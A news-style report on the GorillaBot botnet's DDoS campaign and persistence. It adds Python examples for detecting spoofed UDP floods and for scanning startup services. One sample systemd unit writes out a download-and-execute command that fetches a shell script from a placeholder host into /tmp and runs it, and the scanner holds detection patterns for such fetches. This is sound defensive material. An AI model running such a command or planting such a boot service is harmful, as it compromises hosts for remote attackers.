New GorillaBot Malware Family Spreads Global DDoS Attacks

A new botnet malware family called Gorilla (also GorillaBot), built on the leaked Mirai botnet source code, was identified by cybersecurity firm NSFOCUS last month. According to NSFOCUS, the botnet issued over 300,000 attack commands, at an unusually high attack density, between September 4 and September 27, 2024.

GorillaBot has targeted more than 100 countries, hitting universities, government websites, banks, and gaming-sector organisations; China, the US, Canada, and Germany are among the most attacked. Its DDoS arsenal includes UDP floods alongside several other flood types. Because UDP is connectionless, a target accepts datagrams without any prior handshake, so the bot can stamp arbitrary forged source IP addresses on its flood packets, which defeats simple source-based blocking and hides which hosts are actually infected.
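A spoofed UDP flood has a signature that a flood from unspoofed bots does not: almost every packet toward the target carries a fresh source address. The detector below, an added example rather than anything from the article or NSFOCUS, buckets UDP packets per second per destination and port, and alerts when a bucket has both a high packet count and a high count of distinct sources. The record format ("epoch_seconds proto src_ip dst_ip dst_port"), the thresholds and the sample records are all constructed for illustration.

```python
"""Spoofed-UDP-flood detector over per-packet records (added example)."""
from collections import defaultdict

# Constructed sample input (not real traffic). Lines 1-3 are ordinary traffic;
# the remaining 100 lines mimic a spoofed UDP flood against one game-server port
# within a single second, every packet carrying a different forged source.
SAMPLE_FLOWS = "\n".join(
    [
        "1725400000 udp 10.0.0.5 10.0.0.53 53",
        "1725400000 udp 10.0.0.7 10.0.0.53 53",
        "1725400001 tcp 10.0.0.9 10.0.0.80 80",
    ]
    + [
        f"1725400002 udp {100 + i % 50}.{i}.{(i * 7) % 256}.{i % 200 + 1} 203.0.113.10 27015"
        for i in range(1, 101)
    ]
)


def parse_flows(text):
    """Yield (ts, proto, src, dst, dport) tuples; skip blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, proto, src, dst, dport = parts
        try:
            yield int(ts), proto.lower(), src, dst, int(dport)
        except ValueError:
            continue


def detect_udp_floods(text, window=1, min_packets=50, min_unique_sources=40):
    """Flag (window, dst, dport) buckets with many UDP packets from many distinct
    sources. source_ratio = unique sources / packets: close to 1.0 means nearly
    every packet used a different (forged) address, the hallmark of spoofing;
    a flood from real, unspoofed bots repeats sources and the ratio drops."""
    buckets = defaultdict(lambda: {"packets": 0, "sources": set()})
    for ts, proto, src, dst, dport in parse_flows(text):
        if proto != "udp":
            continue
        key = (ts - ts % window, dst, dport)  # align timestamp to window start
        buckets[key]["packets"] += 1
        buckets[key]["sources"].add(src)

    alerts = []
    for (wstart, dst, dport), b in sorted(buckets.items()):
        uniq = len(b["sources"])
        if b["packets"] >= min_packets and uniq >= min_unique_sources:
            alerts.append({
                "window_start": wstart,
                "dst": dst,
                "dport": dport,
                "packets": b["packets"],
                "unique_sources": uniq,
                "source_ratio": round(uniq / b["packets"], 2),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_udp_floods(SAMPLE_FLOWS):
        print(alert)
```

On real data the thresholds need tuning to the link's baseline, and a low source_ratio with a high packet rate is still a flood, just one whose sources can be blocked at the edge.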

GorillaBot also connects to a set of hard-coded command-and-control (C2) servers and waits for instructions, so the operators can launch attacks remotely. In addition, the malware embeds exploit code for a security flaw in Apache Hadoop YARN RPC, which it uses to gain remote code execution on vulnerable hosts.

To maintain persistence on an infected host, the malware creates a service file that is set to run automatically at system startup; the service downloads a shell script from a remote server and executes it, re-establishing the bot after every reboot. The host therefore stays under the operators' control and remains quiet until it receives attack commands.
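A defender can hunt for exactly this pattern: a boot-time service whose command line fetches something from a URL and runs it. The scanner below is an added example, not the malware's code and not from the article; it assumes the service file is a systemd unit (the article says only "a service file"), and the unit directories, the placeholder hostname and the two sample units are constructed for illustration.

```python
"""Hunt for startup services that download-and-execute a remote script (added example)."""
import re
import tempfile
from pathlib import Path

# Assumption: systemd unit locations. The article does not name the init system.
UNIT_DIRS = ["/etc/systemd/system", "/run/systemd/system", "/usr/lib/systemd/system"]

EXEC_RE = re.compile(r"^\s*Exec(?:Start|StartPre|StartPost|Reload)\s*=\s*-?(.*)$")
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(?:https?|ftp|tftp)://\S+", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:ba|da|a|z)?sh\b", re.I)
SCRATCH_PATH_RE = re.compile(r"(?:^|\s|[\"'])/(?:tmp|var/tmp|dev/shm)/\S+")


def suspicious_exec_lines(unit_text):
    """Return [(line_no, command, [reasons])] for Exec* lines that fetch remote
    content, pipe it into a shell, or touch a scratch directory."""
    findings = []
    for line_no, line in enumerate(unit_text.splitlines(), start=1):
        m = EXEC_RE.match(line)
        if not m:
            continue
        cmd = m.group(1)
        reasons = []
        if DOWNLOAD_RE.search(cmd):
            reasons.append("fetches a remote URL with curl/wget")
        if PIPE_TO_SHELL_RE.search(cmd):
            reasons.append("pipes output into a shell")
        if SCRATCH_PATH_RE.search(cmd):
            reasons.append("runs or writes under a scratch directory")
        if reasons:
            findings.append((line_no, cmd, reasons))
    return findings


def scan_unit_dirs(dirs=UNIT_DIRS):
    """Scan every *.service unit in the given directories; map path -> findings."""
    results = {}
    for d in dirs:
        base = Path(d)
        if not base.is_dir():
            continue
        for unit in sorted(base.glob("*.service")):
            try:
                text = unit.read_text(errors="replace")
            except OSError:
                continue
            findings = suspicious_exec_lines(text)
            if findings:
                results[str(unit)] = findings
    return results


# Constructed sample units. The second mirrors the behaviour the article
# describes (run at boot, fetch a shell script, execute it); the hostname and
# file names are placeholders, not indicators from the article.
BENIGN_UNIT = """[Unit]
Description=OpenSSH server
[Service]
ExecStart=/usr/sbin/sshd -D
[Install]
WantedBy=multi-user.target
"""

MALICIOUS_UNIT = """[Unit]
Description=network helper
[Service]
Type=simple
ExecStart=/bin/sh -c "wget -qO /tmp/.x http://dl.example.invalid/x.sh && sh /tmp/.x"
Restart=always
[Install]
WantedBy=multi-user.target
"""


def demo_scan():
    """Write the sample units into a temporary unit directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "sshd.service").write_text(BENIGN_UNIT)
        Path(tmp, "netcfg-helper.service").write_text(MALICIOUS_UNIT)
        return {Path(p).name: f for p, f in scan_unit_dirs([tmp]).items()}


if __name__ == "__main__":
    for name, findings in demo_scan().items():
        for line_no, cmd, reasons in findings:
            print(f"{name}:{line_no}: {cmd}\n    -> {', '.join(reasons)}")
```

Run as root with the default UNIT_DIRS to check a live host; a hit is a reason to inspect the unit, its enablement symlinks and whatever the script drops, not proof of infection on its own, since some legitimate provisioning units also fetch-and-run.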

NSFOCUS describes GorillaBot as introducing various DDoS attack methods and using encryption algorithms commonly employed by other malicious groups to hide key information, while maintaining long-term control over IoT devices and cloud hosts through multiple counter-detection techniques.
Source: https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.html?m=1